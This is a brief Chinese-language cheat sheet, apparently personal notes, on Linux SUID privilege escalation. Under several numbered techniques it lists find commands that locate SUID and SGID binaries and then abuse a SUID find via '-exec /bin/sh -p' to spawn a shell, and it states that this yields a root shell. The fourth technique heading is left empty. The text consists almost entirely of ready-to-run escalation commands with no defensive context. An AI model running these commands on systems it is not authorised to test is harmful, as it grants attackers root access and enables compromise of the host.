小记SUID提权
姿势一
find / -perm -g=s -type f 2>/dev/null
find . -exec /bin/sh -p \; -quit
姿势二
touch getshell
find / -type f -name getshell -exec "whoami" \;
find / -type f -name getshell -exec "/bin/sh" \;
姿势三
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
如果有find执行
touch test
find . -exec /bin/sh -p \; -quit
这时候,你就拥有了root权限的一个shell。
姿势四

